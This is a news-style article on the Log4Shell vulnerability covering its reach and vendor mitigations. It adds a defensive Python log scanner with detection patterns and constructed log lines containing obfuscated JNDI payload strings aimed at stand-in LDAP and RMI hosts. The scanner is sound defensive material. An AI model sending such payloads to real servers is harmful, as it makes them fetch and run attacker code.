
Since the Log4j flaw (CVE-2021-44228, commonly called Log4Shell) was discovered last week, the cybersecurity community has gone into overdrive to identify vulnerable applications, detect attack attempts, and mitigate exploitation in any way possible. Nonetheless, the vulnerability will almost certainly be used in serious intrusions.
Researchers have seen attackers use the Log4j vulnerability to install ransomware on honeypot servers, which are machines that are intentionally made vulnerable in order to track down new threats. Nearly half of the corporate networks that one cybersecurity firm was monitoring had seen attempts to exploit the flaw. Early on, the CEO of Cloudflare, a website and network security provider, stated that the threat was so severe that the company would provide free firewall protection to all customers, even those who had not paid for it. However, concrete information on exploitation in the wild is scarce, owing to the fact that victims are either unaware of or unwilling to publicly acknowledge that their systems have been hacked.
What is certain is that the vulnerability’s scope is enormous. At the time of publication, the Cybersecurity and Infrastructure Security Agency (CISA) had compiled a list of affected software that numbered more than 500 items and was limited to only enterprise software platforms. A comprehensive list of all affected applications would undoubtedly number in the thousands.
Log4Shell is affecting an unusually large portion of the internet, even by the standards of high-profile vulnerabilities. It reflects the fact that the Java programming language is widely used in enterprise software, and the Log4j library is widely used in Java software.
According to analysts, the discovery of an easily exploitable bug in a primarily enterprise-oriented language is part of a “nearly perfect storm” surrounding the Log4j vulnerability. Multiple programs containing the vulnerable library — in some cases, multiple versions of the same program — could be running at the same time in a single company.
Cloudflare was one company that acted quickly, according to John Graham-Cumming, Cloudflare's CTO: it added new rules to its web application firewall that block HTTP requests containing strings resembling the Log4j attack payload, the JNDI lookup string that the vulnerable library interpolates when it logs attacker-controlled input such as a User-Agent header. ExpressVPN also updated its product to protect against Log4Shell, changing its VPN rules to block all outgoing traffic on LDAP ports, which the exploit uses to fetch a reference from an attacker-controlled server and download code onto the vulnerable machine. Both are partial defenses: attackers obfuscate the payload with nested lookups to slip past string matching, and the JNDI lookup can point at any port and at other providers such as RMI, so blocking only the standard LDAP ports does not close the outbound path.
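The string-matching approach described above is easy to evade unless the rule first undoes the obfuscations attackers use. The following is an added example, not code from Cloudflare, ExpressVPN or any vendor mentioned on this page: a small Python detector that URL-decodes a request line, resolves the Log4j lookup tricks seen in the wild (the `${lower:x}` and `${upper:x}` lookups and the `${...:-x}` default-value syntax that turns `${::-j}` into `j`), and then looks for a `${jndi:<provider>:...}` lookup. The log lines are constructed for illustration; the IP addresses are documentation ranges, not real attacker infrastructure.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: no nested "${" inside the braces.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# After normalization the payload should read like ${jndi:ldap://host/...}.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:[^}]*\}",
    re.IGNORECASE,
)


def _resolve_inner(expr: str) -> str:
    """Resolve one innermost lookup the way Log4j 2 would, for the
    obfuscation-only lookups; anything else is left intact."""
    if expr.lower().startswith("jndi:"):
        return "${" + expr + "}"          # never rewrite the jndi lookup itself
    if ":-" in expr:                       # ${env:NOPE:-j} and ${::-j} -> "j"
        return expr.split(":-", 1)[1]
    prefix, sep, rest = expr.partition(":")
    if sep and prefix.lower() == "lower":  # ${lower:J} -> "j"
        return rest.lower()
    if sep and prefix.lower() == "upper":  # ${upper:j} -> "J"
        return rest.upper()
    return "${" + expr + "}"               # e.g. ${date:yyyy}: benign, unchanged


def normalize_payload(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then repeatedly collapse innermost lookups until
    the string stops changing (bounded so a hostile input cannot loop)."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(lambda m: _resolve_inner(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_log_lines(lines):
    """Return (line_index, normalized_jndi_lookup) for every line whose
    normalized form contains a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        match = _JNDI.search(normalize_payload(line))
        if match:
            hits.append((i, match.group(0)))
    return hits


# Constructed Apache combined-format log lines (not real traffic).
LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.20:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.20:1389/a} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.21:1099/obj}"',
    '203.0.113.13 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.22%2Fx%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.15 - - [10/Dec/2021:14:02:16 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, lookup in scan_log_lines(LOG_LINES):
        print(f"line {idx}: {lookup}")
```

The last line in the sample, which carries a harmless `${date:yyyy}` lookup, is deliberately included so the detector is checked against a false positive as well as against the plain, nested, default-value and URL-encoded forms of the payload. A rule that matched only the literal `${jndi:` would have missed three of the four attack lines.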
Heartbleed, one of the most widespread internet security flaws of the last decade, was also caused by a bug in a widely used open-source library, OpenSSL. Following the discovery of that bug, tech giants such as Google, Microsoft, and Facebook pledged to invest more in open-source projects that are critical to the internet's infrastructure. However, in the aftermath of the Log4j debacle, it is clear that managing dependencies is still a major security issue, and one that we are not close to solving.